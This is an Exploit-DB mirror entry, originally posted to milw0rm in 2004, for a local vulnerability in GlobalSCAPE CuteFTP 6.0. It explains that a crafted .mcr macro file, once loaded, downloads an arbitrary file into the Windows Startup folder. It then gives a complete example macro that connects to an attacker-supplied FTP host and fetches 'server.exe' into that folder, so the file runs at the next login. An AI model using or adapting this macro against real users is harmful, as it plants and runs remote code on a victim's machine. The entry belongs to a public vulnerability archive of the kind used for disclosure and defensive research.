exploit-db-mirror/exploits/windows/local/560.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

29 lines
No EOL
589 B
Text

Application: GlobalSCAPE CuteFTP V6.0
http://www.globalscape.com/
Risk: Medium
/*
e-mail: atmaca@prohack.net
web: http://www.prohack.net
*/
--The bug:
Atacker can create a crafted CuteFTP macro (*.mcr),
and when its loaded in the target computer, it can download the Arbitrary file
into the target users startup folder.
----example *.mcr macro----
Host FTP_HOST_HERE
Login Normal
User FTP_USER_HERE
Pass FTP_PASS_HERE
Connect
RemoteSelect server.exe
Download
LocalCwd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
# milw0rm.com [2004-09-28]